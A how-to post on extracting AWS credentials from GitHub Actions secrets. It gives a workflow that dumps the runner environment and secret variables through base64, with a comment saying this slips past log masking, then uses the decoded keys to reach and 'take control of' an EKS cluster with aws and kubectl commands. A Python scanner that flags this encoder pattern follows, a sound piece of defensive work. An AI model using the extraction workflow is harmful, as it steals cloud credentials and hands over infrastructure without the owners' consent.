How to get your GitHub secrets from GitHub Actions
GitHub Secrets
GitHub Actions is an automation and continuous integration/continuous deployment (CI/CD) platform provided by GitHub. It allows you to automate various tasks and workflows within your GitHub repositories, such as building, testing, and deploying your code.
GitHub Actions allows you to store sensitive information, such as API keys or access tokens, as secrets. These secrets are encrypted and can be accessed from within your workflows, allowing you to automate tasks that require sensitive information without compromising security.
While GitHub Secrets are secure from being exposed in plaintext within your code and logs, they are not foolproof against users with repository access because anyone with write access to the repository can potentially modify or misuse them. GitHub Secrets primarily protect against accidental exposure in public code repositories and are best suited for protecting sensitive information from unintentional leaks rather than malicious actions from users with repository access.
Access to the EKS using GitHub secrets
This post provides instructions for accessing the Amazon EKS service using GitHub secrets. The user is shown how to create a GitHub action, retrieve environment variables, add new credentials, and finally, access the EKS cluster using kubectl or Lens.
1. Take note of your GitHub Secrets
- Open the repository settings on GitHub and locate the Secrets section.
- Examine the names of your stored secrets for reference.
2. Create a GitHub action for the repository that has Admin access through the pipeline.
    name: test
    on:
      workflow_dispatch:   # started manually from the Actions tab
    jobs:
      deploy:
        runs-on: ubuntu-latest
        steps:
          - name: Get runner env variables
            run: env | base64
          - name: Get AWS secrets
            env:
              AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
              AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
            # base64 output is not matched by the log masking of secret values
            run: |
              echo "AWS_ACCESS_KEY_ID= $AWS_ACCESS_KEY_ID" | base64
              echo "AWS_SECRET_ACCESS_KEY= $AWS_SECRET_ACCESS_KEY" | base64
3. Run the action to get the environment variables from the runner
4. The output is base64-encoded, so you need to decode it to extract the variables.
5. Add new credentials
    nano ~/.aws/credentials

    [test]
    aws_access_key_id = <aws_access_key_id>
    aws_secret_access_key = <aws_secret_access_key>
    region = <region>

    export AWS_PROFILE=test
6. Check if you can access the EKS cluster
    aws eks list-clusters

Output:
    {
        "clusters": [
            "example1",
            "example2"
        ]
    }
7. Check out the AWS account
aws sts get-caller-identity
8. Get Kubeconfig file locally
aws eks update-kubeconfig --name example1
9. You can now take control of EKS cluster
kubectl get pods -A
kubectl get all -n <name>
kubectl get deployment -n dev <name> -o yaml
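For repository owners reviewing workflow changes, the pattern in step 2 (piping the environment or a secret-backed variable through an encoder so the log masker no longer matches it) can be flagged before merge. The following is an added example, not code from the original post; the function name scan_workflow, the regexes and the sample workflow are assumptions made for illustration, and the check is line-based rather than a full YAML parse.

```python
import re

# Added example (not from the original post); all names here are illustrative.
# Transforms that change a secret's bytes so the log masker no longer matches it.
ENCODER = re.compile(r"\|\s*(?:base64|base32|xxd|od|hexdump|rev|openssl\s+enc)\b")
ENV_DUMP = re.compile(r"(?:^|[\s;&(])(?:env|printenv|export\s+-p)\s*\|")
SECRET_ENV = re.compile(r"^\s*(\w+)\s*:\s*\$\{\{\s*secrets\.")
SECRET_INLINE = re.compile(r"\$\{\{\s*secrets\.")

def scan_workflow(text):
    """Return [(line_number, reason)]; secret variables are tracked per file."""
    findings, secret_vars = [], set()
    for number, line in enumerate(text.splitlines(), 1):
        mapped = SECRET_ENV.match(line)
        if mapped:
            secret_vars.add(mapped.group(1))  # env var populated from secrets.*
            continue
        if not ENCODER.search(line):
            continue
        if ENV_DUMP.search(line):
            findings.append((number, "environment dump piped to an encoder"))
        elif SECRET_INLINE.search(line) or any(
            re.search(r"\$\{?" + re.escape(name) + r"\b", line) for name in secret_vars
        ):
            findings.append((number, "secret-backed variable piped to an encoder"))
    return findings

# Constructed sample: the shape of the workflow in step 2 plus one benign step.
SAMPLE = """\
name: test
on:
  workflow_dispatch:
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Get runner env variables
        run: env | base64
      - name: Get AWS secrets
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        run: |
          echo "AWS_ACCESS_KEY_ID= $AWS_ACCESS_KEY_ID" | base64
      - name: Benign step
        run: echo "build finished" | tee build.log
"""

if __name__ == "__main__":
    for number, reason in scan_workflow(SAMPLE):
        print(f"line {number}: {reason}")
```

A check like this only catches the obvious encoders, so it complements rather than replaces restricting who can push workflow changes and requiring review for the .github/workflows directory.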